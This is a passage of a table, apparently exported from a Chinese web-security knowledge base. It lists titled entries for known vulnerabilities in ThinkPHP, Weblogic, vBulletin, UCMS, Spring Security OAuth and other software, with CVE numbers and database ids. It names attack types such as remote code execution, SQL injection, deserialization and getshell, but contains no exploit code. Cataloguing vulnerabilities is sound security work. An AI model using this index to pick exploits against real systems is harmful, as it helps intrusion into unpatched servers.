| 690  | Web安全 | Spring Security Oauth          | {'id': 6661, 'name': '（CVE-2016-4977）Spring Security OAuth2 远程命令执行漏洞', 'pid': 256, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6661, 'title': None}                                                |
| 691  | Web安全 | Spring Security Oauth          | {'id': 6476, 'name': '（CVE-2018-1260）Spring Security Oauth2 远程代码执行', 'pid': 256, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6476, 'title': None}                                                  |
| 692  | Web安全 | Spring Security Oauth          | {'id': 6477, 'name': '（CVE-2019-3778）Spring Security OAuth2 开放重定向', 'pid': 256, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6477, 'title': None}                                                   |
| 693  | Web安全 | Spring WebFlow                 | {'id': 6662, 'name': '（CVE-2017-4971）Spring WebFlow 远程代码执行漏洞', 'pid': 293, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6662, 'title': None}                                                        |
| 694  | Web安全 | SQL Server                     | {'id': 5927, 'name': '（CVE-2020-0618）SQL Server 远程代码执行漏洞 ', 'pid': 119, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5927, 'title': None}                                                           |
| 695  | Web安全 | Squid                          | {'id': 6614, 'name': '（CVE-2019-18679）Squid 敏感信息泄漏', 'pid': 282, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6614, 'title': None}                                                                  |
| 696  | Web安全 | Supervisord                    | {'id': 6976, 'name': '（CVE-2017-11610）Supervisord 远程命令执行漏洞', 'pid': 370, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6976, 'title': None}                                                          |
| 697  | Web安全 | Swagger                        | {'id': 7162, 'name': 'Swagger 未授权访问漏洞', 'pid': 422, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7162, 'title': None}                                                                               |
| 698  | Web安全 | Swagger                        | {'id': 7161, 'name': '（CVE-2016-5641）Swagger 参数注入导致的远程代码执行漏洞', 'pid': 422, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7161, 'title': None}                                                        |
| 699  | Web安全 | Swagger                        | {'id': 7159, 'name': '（CVE-2019-17495）Swagger css注入漏洞', 'pid': 422, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7159, 'title': None}                                                               |
| 700  | Web安全 | Teamviewer                     | {'id': 7193, 'name': '（CVE-2019-18988）Teamviewer v14.7.1965 凭证破解', 'pid': 431, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7193, 'title': None}                                                    |
| 701  | Web安全 | TechPowerUp GPU-Z              | {'id': 7318, 'name': '（CVE-2019-7245）TechPowerUp GPU-Z MSR 寄存器任意读写漏洞', 'pid': 476, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7318, 'title': None}                                                |
| 702  | Web安全 | TerraMaster TOS                | {'id': 7372, 'name': '（CVE-2020-28188）TerraMaster TOS 远程命令执行漏洞', 'pid': 492, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7372, 'title': None}                                                      |
| 703  | Web安全 | ThinkAdmin                     | {'id': 7109, 'name': '（ CVE-2020-25540）ThinkAdmin 未授权列目录/任意文件读取', 'pid': 400, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7109, 'title': None}                                                     |
| 704  | Web安全 | ThinkAdmin                     | {'id': 7335, 'name': '（CNVD-2020-72464）ThinkAdmin 未授权访问漏洞', 'pid': 400, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7335, 'title': None}                                                           |
| 705  | Web安全 | ThinkCMF                       | {'id': 5928, 'name': 'ThinkCMF 缓存Getshell', 'pid': 120, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5928, 'title': None}                                                                           |
| 706  | Web安全 | ThinkCMF                       | {'id': 5929, 'name': 'ThinkCMF 框架上的任意内容包含漏洞', 'pid': 120, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5929, 'title': None}                                                                         |
| 707  | Web安全 | ThinkCMF                       | {'id': 5930, 'name': 'THINKCMF v2.2.3漏洞合集', 'pid': 120, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5930, 'title': None}                                                                           |
| 708  | Web安全 | ThinkCMF                       | {'id': 7408, 'name': '（CVE-2018-19894）ThinkCMF v2.2.2 前台sql注漏洞', 'pid': 120, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7408, 'title': None}                                                      |
| 709  | Web安全 | ThinkCMF                       | {'id': 5931, 'name': '（CVE-2019-7580）ThinkCMF v5.0.190111 后台代码执行漏洞', 'pid': 120, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5931, 'title': None}                                                  |
| 710  | Web安全 | Thinkphp                       | {'id': 7071, 'name': 'Thinkphp v3.1.3 sql注入漏洞', 'pid': 122, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7071, 'title': None}                                                                       |
| 711  | Web安全 | Thinkphp                       | {'id': 5934, 'name': 'Thinkphp v3.2.3 update注入漏洞', 'pid': 122, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5934, 'title': None}                                                                    |
| 712  | Web安全 | Thinkphp                       | {'id': 5935, 'name': 'Thinkphp v3.2.3 select\&find\&delete 注入漏洞', 'pid': 122, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5935, 'title': None}                                                     |
| 713  | Web安全 | Thinkphp                       | {'id': 5936, 'name': 'Thinkphp v3.2.3 缓存漏洞', 'pid': 122, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5936, 'title': None}                                                                          |
| 714  | Web安全 | Thinkphp                       | {'id': 5933, 'name': 'Thinkphp v3.x order by 注入漏洞', 'pid': 122, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5933, 'title': None}                                                                   |
| 715  | Web安全 | Thinkphp                       | {'id': 7227, 'name': 'Thinkphp v3.x 日志爆破脚本', 'pid': 122, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7227, 'title': None}                                                                          |
| 716  | Web安全 | Thinkphp                       | {'id': 6716, 'name': 'Thinkphp v5.x 命令执行漏洞说明', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6716, 'title': None}                                                                        |
| 717  | Web安全 | Thinkphp                       | {'id': 5937, 'name': 'Thinkphp v5.0.1', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5937, 'title': None}                                                                               |
| 718  | Web安全 | Thinkphp                       | {'id': 6708, 'name': 'Thinkphp v5.0.2', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6708, 'title': None}                                                                               |
| 719  | Web安全 | Thinkphp                       | {'id': 6709, 'name': 'Thinkphp v5.0.3', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6709, 'title': None}                                                                               |
| 720  | Web安全 | Thinkphp                       | {'id': 6710, 'name': 'Thinkphp v5.0.4', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6710, 'title': None}                                                                               |
| 721  | Web安全 | Thinkphp                       | {'id': 5938, 'name': 'Thinkphp v5.0.5', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5938, 'title': None}                                                                               |
| 722  | Web安全 | Thinkphp                       | {'id': 6711, 'name': 'Thinkphp v5.0.6', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6711, 'title': None}                                                                               |
| 723  | Web安全 | Thinkphp                       | {'id': 6712, 'name': 'Thinkphp v5.0.7', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6712, 'title': None}                                                                               |
| 724  | Web安全 | Thinkphp                       | {'id': 6703, 'name': 'Thinkphp v5.0.8', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6703, 'title': None}                                                                               |
| 725  | Web安全 | Thinkphp                       | {'id': 6714, 'name': 'Thinkphp v5.0.9', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6714, 'title': None}                                                                               |
| 726  | Web安全 | Thinkphp                       | {'id': 5939, 'name': 'Thinkphp v5.0.10', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5939, 'title': None}                                                                              |
| 727  | Web安全 | Thinkphp                       | {'id': 5940, 'name': 'Thinkphp v5.0.11', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5940, 'title': None}                                                                              |
| 728  | Web安全 | Thinkphp                       | {'id': 6713, 'name': 'Thinkphp v5.0.12', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6713, 'title': None}                                                                              |
| 729  | Web安全 | Thinkphp                       | {'id': 6715, 'name': 'Thinkphp v5.0.13', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6715, 'title': None}                                                                              |
| 730  | Web安全 | Thinkphp                       | {'id': 5941, 'name': 'Thinkphp v5.0.14', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5941, 'title': None}                                                                              |
| 731  | Web安全 | Thinkphp                       | {'id': 6718, 'name': 'Thinkphp v5.0.15', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6718, 'title': None}                                                                              |
| 732  | Web安全 | Thinkphp                       | {'id': 5942, 'name': 'Thinkphp v5.0.16', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5942, 'title': None}                                                                              |
| 733  | Web安全 | Thinkphp                       | {'id': 6719, 'name': 'Thinkphp v5.0.17', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6719, 'title': None}                                                                              |
| 734  | Web安全 | Thinkphp                       | {'id': 5943, 'name': 'Thinkphp v5.0.18', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5943, 'title': None}                                                                              |
| 735  | Web安全 | Thinkphp                       | {'id': 6720, 'name': 'Thinkphp v5.0.19', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6720, 'title': None}                                                                              |
| 736  | Web安全 | Thinkphp                       | {'id': 6721, 'name': 'Thinkphp v5.0.20', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6721, 'title': None}                                                                              |
| 737  | Web安全 | Thinkphp                       | {'id': 5944, 'name': 'Thinkphp v5.0.21', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5944, 'title': None}                                                                              |
| 738  | Web安全 | Thinkphp                       | {'id': 5945, 'name': 'Thinkphp v5.0.22', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5945, 'title': None}                                                                              |
| 739  | Web安全 | Thinkphp                       | {'id': 5946, 'name': 'Thinkphp v5.0.23', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5946, 'title': None}                                                                              |
| 740  | Web安全 | Thinkphp                       | {'id': 5947, 'name': 'Thinkphp v5.1.18', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5947, 'title': None}                                                                              |
| 741  | Web安全 | Thinkphp                       | {'id': 5948, 'name': 'Thinkphp v5.1.29', 'pid': 123, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5948, 'title': None}                                                                              |
| 742  | Web安全 | Thinkphp                       | {'id': 5949, 'name': 'v5.0.0 <= Thinkphp <= v5.0.18 文件包含漏洞', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5949, 'title': None}                                                          |
| 743  | Web安全 | Thinkphp                       | {'id': 5950, 'name': 'v5.0.0 <= Thinkphp <= v5.0.10 缓存漏洞', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5950, 'title': None}                                                            |
| 744  | Web安全 | Thinkphp                       | {'id': 5951, 'name': 'Thinkphp v5.0.10 sql注入漏洞', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5951, 'title': None}                                                                      |
| 745  | Web安全 | Thinkphp                       | {'id': 5952, 'name': 'v5.0.13 <= Thinkphp <= v5.0.15 sql注入漏洞', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5952, 'title': None}                                                        |
| 746  | Web安全 | Thinkphp                       | {'id': 5953, 'name': 'v5.0.0 <= Thinkphp <= v5.0.21 sql注入漏洞', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5953, 'title': None}                                                         |
| 747  | Web安全 | Thinkphp                       | {'id': 5954, 'name': 'Thinkphp v5.0.24 mysql账号密码泄露', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5954, 'title': None}                                                                  |
| 748  | Web安全 | Thinkphp                       | {'id': 5955, 'name': 'v5.1.0 <= ThinkPHP <= v5.1.10 文件包含漏洞', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5955, 'title': None}                                                          |
| 749  | Web安全 | Thinkphp                       | {'id': 5956, 'name': 'v5.1.0 <= Thinkphp <= v5.1.5 sql注入漏洞', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5956, 'title': None}                                                          |
| 750  | Web安全 | Thinkphp                       | {'id': 5957, 'name': 'v5.1.6 <= Thinkphp <= v5.1.7（非最新的 5.1.8 版本也可利用）sql注入漏洞', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5957, 'title': None}                                        |
| 751  | Web安全 | Thinkphp                       | {'id': 5958, 'name': 'v5.1.16 <= Thinkphp <= v5.1.22 sql注入漏洞', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5958, 'title': None}                                                        |
| 752  | Web安全 | Thinkphp                       | {'id': 5959, 'name': '（CVE-2018-16385）Thinkphp < v5.1.23 sql注入漏洞', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5959, 'title': None}                                                    |
| 753  | Web安全 | Thinkphp                       | {'id': 5960, 'name': 'v5.1.3 <= ThinkPHP <= v5.1.25', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5960, 'title': None}                                                                 |
| 754  | Web安全 | Thinkphp                       | {'id': 5961, 'name': 'Thinkphp v5.x 全版本 sql注入漏洞', 'pid': 124, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5961, 'title': None}                                                                     |
| 755  | Web安全 | Thinkphp                       | {'id': 5962, 'name': 'Thinkphp < v6.0.2 session id未作过滤导致getshell', 'pid': 125, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5962, 'title': None}                                                    |
| 756  | Web安全 | Thinkphp                       | {'id': 5963, 'name': 'Thinkphp v6.0 任意文件写入pop链', 'pid': 125, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5963, 'title': None}                                                                      |
| 757  | Web安全 | Thinkphp                       | {'id': 5964, 'name': 'Thinkphp v6.1 任意文件创建&删除漏洞', 'pid': 125, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5964, 'title': None}                                                                     |
| 758  | Web安全 | Thinkphp                       | {'id': 5965, 'name': 'Thinkphp v5.0.24 反序列化漏洞', 'pid': 126, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5965, 'title': None}                                                                       |
| 759  | Web安全 | Thinkphp                       | {'id': 5966, 'name': 'Thinkphp v5.1.1 反序列化pop链构造', 'pid': 126, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5966, 'title': None}                                                                    |
| 760  | Web安全 | Thinkphp                       | {'id': 5967, 'name': 'Thinkphp v5.1.37 反序列化漏洞', 'pid': 126, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5967, 'title': None}                                                                       |
| 761  | Web安全 | Thinkphp                       | {'id': 5968, 'name': 'Thinkphp v5.2.x 反序列化漏洞', 'pid': 126, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5968, 'title': None}                                                                        |
| 762  | Web安全 | Thinkphp                       | {'id': 5969, 'name': 'Thinkphp v6.0.x 反序列化漏洞', 'pid': 126, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5969, 'title': None}                                                                        |
| 763  | Web安全 | Thinkphp                       | {'id': 5932, 'name': 'Thinkphp专用shell', 'pid': 121, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5932, 'title': None}                                                                               |
| 764  | Web安全 | Thinkphp shop                  | {'id': 5970, 'name': 'Thinkphp Shop前台SQL注入', 'pid': 127, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5970, 'title': None}                                                                          |
| 765  | Web安全 | Thinkphp shop                  | {'id': 5971, 'name': '（CVE-2018-9919）Thinkphp Shop LinkTagTeet.php 文件漏洞', 'pid': 127, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5971, 'title': None}                                             |
| 766  | Web安全 | Thinkphp shop                  | {'id': 7407, 'name': 'Thinkphp Shop LinkTag eval-stdin.php 文件漏洞', 'pid': 127, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7407, 'title': None}                                                     |
| 767  | Web安全 | Thinkphp shop                  | {'id': 5972, 'name': 'Thinkphp Shop 供应商后台本地文件包含导致权限提升', 'pid': 127, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5972, 'title': None}                                                               |
| 768  | Web安全 | ThinkSNS                       | {'id': 6959, 'name': 'ThinkSNS v4 后台任意文件下载导致getshell', 'pid': 364, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6959, 'title': None}                                                                |
| 769  | Web安全 | TinyMCE                        | {'id': 7273, 'name': '（CVE-2020-12648）TinyMCE 反射型xss漏洞', 'pid': 457, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7273, 'title': None}                                                              |
| 770  | Web安全 | TRS                            | {'id': 7385, 'name': 'TRS WCM 任意文件上传漏洞', 'pid': 496, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7385, 'title': None}                                                                              |
| 771  | Web安全 | TRS                            | {'id': 7386, 'name': 'TRS WAS v4.5 sql注入漏洞', 'pid': 496, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7386, 'title': None}                                                                          |
| 772  | Web安全 | TRS                            | {'id': 7387, 'name': '（CNVD-2020-27769）TRS WAS v5.0 任意文件读取漏洞', 'pid': 496, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7387, 'title': None}                                                        |
| 773  | Web安全 | Typecho                        | {'id': 5995, 'name': 'Typecho 1.1 反序列化漏洞导致前台getshell', 'pid': 132, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5995, 'title': None}                                                                |
| 774  | Web安全 | Typesetter CMS                 | {'id': 7397, 'name': '（CVE-2020-25790）Typesetter CMS 任意代码执行漏洞', 'pid': 499, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7397, 'title': None}                                                       |
| 775  | Web安全 | Ueditor                        | {'id': 5996, 'name': 'ueditor ssrf', 'pid': 133, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5996, 'title': None}                                                                                  |
| 776  | Web安全 | Ueditor                        | {'id': 5997, 'name': 'ueditor 允许xml上传的xss漏洞', 'pid': 133, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5997, 'title': None}                                                                         |
| 777  | Web安全 | Ueditor                        | {'id': 5998, 'name': 'ueditor .net版本上传漏洞', 'pid': 133, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5998, 'title': None}                                                                            |
| 778  | Web安全 | Ueditor                        | {'id': 5999, 'name': '百度ueditor编辑器 xss漏洞', 'pid': 133, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5999, 'title': None}                                                                            |
| 779  | Web安全 | UCMS                           | {'id': 7279, 'name': '（CVE-2020-25483）UCMS <= v1.4.7 后台远程代码执行漏洞', 'pid': 460, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7279, 'title': None}                                                     |
| 780  | Web安全 | UCMS                           | {'id': 7280, 'name': 'UCMS <= v1.4.7 后台任意文件上传漏洞', 'pid': 460, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7280, 'title': None}                                                                     |
| 781  | Web安全 | UCMS                           | {'id': 7281, 'name': 'UCMS <= v1.4.7 后台sql注入漏洞', 'pid': 460, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7281, 'title': None}                                                                      |
| 782  | Web安全 | UCMS                           | {'id': 7282, 'name': 'UCMS <= v1.4.7 后台xss漏洞（一）', 'pid': 460, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7282, 'title': None}                                                                     |
| 783  | Web安全 | UCMS                           | {'id': 7283, 'name': 'UCMS <= v1.4.7 后台xss漏洞（二）', 'pid': 460, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7283, 'title': None}                                                                     |
| 784  | Web安全 | Umbraco CMS                    | {'id': 6000, 'name': 'Umbraco CMS 7.12.4 后台远程命令执行漏洞', 'pid': 134, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6000, 'title': None}                                                                 |
| 785  | Web安全 | UsualToolcms                   | {'id': 6001, 'name': 'UsualToolcms 8.0 系统重装漏洞', 'pid': 135, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6001, 'title': None}                                                                       |
| 786  | Web安全 | UsualToolcms                   | {'id': 6002, 'name': 'UsualToolcms 8.0 myup.php 前台任意文件删除', 'pid': 135, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6002, 'title': None}                                                            |
| 787  | Web安全 | UsualToolcms                   | {'id': 6003, 'name': 'UsualToolcms 8.0 绕过后台验证码爆破', 'pid': 135, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6003, 'title': None}                                                                    |
| 788  | Web安全 | UsualToolcms                   | {'id': 6004, 'name': 'UsualToolcms 8.0 后台GETSHELL', 'pid': 135, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6004, 'title': None}                                                                   |
| 789  | Web安全 | UsualToolcms                   | {'id': 6005, 'name': 'UsualToolcms 8.0 a\_users\_level.php 后台盲注', 'pid': 135, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6005, 'title': None}                                                     |
| 790  | Web安全 | UsualToolcms                   | {'id': 6006, 'name': 'UsualToolcms 8.0 前台sql', 'pid': 135, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6006, 'title': None}                                                                        |
| 791  | Web安全 | UsualToolcms                   | {'id': 7043, 'name': 'UsualToolcms v8.0 a\_users\_level.php 后台int型注入', 'pid': 135, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7043, 'title': None}                                                |
| 792  | Web安全 | UsualToolcms                   | {'id': 7044, 'name': 'UsualToolcms v8.0 a\_pagex.php盲注', 'pid': 135, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7044, 'title': None}                                                              |
| 793  | Web安全 | UsualToolcms                   | {'id': 7045, 'name': 'UsualToolcms v8.0 后台反射型XSS', 'pid': 135, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7045, 'title': None}                                                                    |
| 794  | Web安全 | UsualToolcms                   | {'id': 7046, 'name': 'UsualToolcms v8.0 a\_bookx.php 后台注入漏洞', 'pid': 135, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7046, 'title': None}                                                         |
| 795  | Web安全 | UsualToolcms                   | {'id': 7047, 'name': 'UsualToolcms v8.0 a\_modsx.php 任意文件删除', 'pid': 135, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7047, 'title': None}                                                         |
| 796  | Web安全 | uWSGI                          | {'id': 6978, 'name': 'uWSGI 未授权访问漏洞', 'pid': 371, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6978, 'title': None}                                                                                 |
| 797  | Web安全 | uWSGI                          | {'id': 6977, 'name': '（CVE-2018-7490）uWSGI PHP目录穿越漏洞', 'pid': 371, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6977, 'title': None}                                                                |
| 798  | Web安全 | vBulletin                      | {'id': 6007, 'name': '（CVE-2015-7808）VBulletin 远程命令执行漏洞', 'pid': 136, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6007, 'title': None}                                                             |
| 799  | Web安全 | vBulletin                      | {'id': 6008, 'name': '（CVE-2019-16759）vBulletin 5.x 远程命令执行漏洞', 'pid': 136, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6008, 'title': None}                                                        |
| 800  | Web安全 | vBulletin                      | {'id': 6009, 'name': "（CVE-2019-17132）vBulletin 5.0 <5.5.4-'updateAvatar'身份验证的远程代码执行漏洞", 'pid': 136, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6009, 'title': None}                              |
| 801  | Web安全 | vBulletin                      | {'id': 6548, 'name': '（CVE-2020-12720）vBulletin 未授权sql注入漏洞', 'pid': 136, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6548, 'title': None}                                                          |
| 802  | Web安全 | VMware                         | {'id': 7156, 'name': 'VMware vCenter Server < 6.5u1 任意文件读取漏洞', 'pid': 420, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7156, 'title': None}                                                        |
| 803  | Web安全 | VMware                         | {'id': 7185, 'name': '（CVE-2020-3952）VMware vCenter Server 6.7 信息泄露漏洞', 'pid': 420, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7185, 'title': None}                                               |
| 804  | Web安全 | Webkit                         | {'id': 6495, 'name': '（CVE-2018-4441）Webkit shiftCountWithArrayStorage', 'pid': 267, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6495, 'title': None}                                              |
| 805  | Web安全 | Weblogic                       | {'id': 6010, 'name': 'Weblogic爆破', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6010, 'title': None}                                                                                    |
| 806  | Web安全 | Weblogic                       | {'id': 7218, 'name': 'Weblogic IIOP 协议NAT 网络绕过', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7218, 'title': None}                                                                      |
| 807  | Web安全 | Weblogic                       | {'id': 7257, 'name': '（CVE-2016-3510）Weblogic 反序列化漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7257, 'title': None}                                                                |
| 808  | Web安全 | Weblogic                       | {'id': 6011, 'name': '（CVE-2017-3248）Weblogic 反序列化漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6011, 'title': None}                                                                |
| 809  | Web安全 | Weblogic                       | {'id': 6012, 'name': '（CVE-2017-3506）Weblogic反序列化漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6012, 'title': None}                                                                 |
| 810  | Web安全 | Weblogic                       | {'id': 6013, 'name': '（CVE-2017-10271）Weblogic XMLDecoder 反序列化漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6013, 'title': None}                                                    |
| 811  | Web安全 | Weblogic                       | {'id': 6014, 'name': '（CVE-2018-2628）Weblogic反序列化漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6014, 'title': None}                                                                 |
| 812  | Web安全 | Weblogic                       | {'id': 6015, 'name': '（CVE-2018-2893）Weblogic WLS核心组件反序列化漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6015, 'title': None}                                                         |
| 813  | Web安全 | Weblogic                       | {'id': 6016, 'name': '（CVE-2018-2894）Weblogic任意文件上传', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6016, 'title': None}                                                                 |
| 814  | Web安全 | Weblogic                       | {'id': 6017, 'name': '（CVE-2018-3191）Weblogic远程代码执行漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6017, 'title': None}                                                               |
| 815  | Web安全 | Weblogic                       | {'id': 6018, 'name': '（CVE-2018-3245）Weblogic反序列化远程代码执行漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6018, 'title': None}                                                           |
| 816  | Web安全 | Weblogic                       | {'id': 6539, 'name': '（CVE-2019-2615）Weblogic 任意文件读取漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6539, 'title': None}                                                              |
| 817  | Web安全 | Weblogic                       | {'id': 6019, 'name': '（CVE-2019-2618）Weblogic任意文件上传漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6019, 'title': None}                                                               |
| 818  | Web安全 | Weblogic                       | {'id': 6020, 'name': '（CVE-2019-2725）（CNVD-C-2019-48814）Weblogic反序列化远程代码执行漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6020, 'title': None}                                        |
| 819  | Web安全 | Weblogic                       | {'id': 6021, 'name': '（CVE-2019-2729）Weblogic反序列化漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6021, 'title': None}                                                                 |
| 820  | Web安全 | Weblogic                       | {'id': 6479, 'name': '（CVE-2019-2888）Weblogic EJBTaglibDescriptor XXE漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6479, 'title': None}                                             |
| 821  | Web安全 | Weblogic                       | {'id': 6022, 'name': '（CVE-2019-2890）Weblogic反序列化漏洞', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6022, 'title': None}                                                                 |
| 822  | Web安全 | Weblogic                       | {'id': 6023, 'name': '（CVE-2020-2551）Weblogic IIOP协议反序列化rce', 'pid': 137, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6023, 'title': None}                                                         |
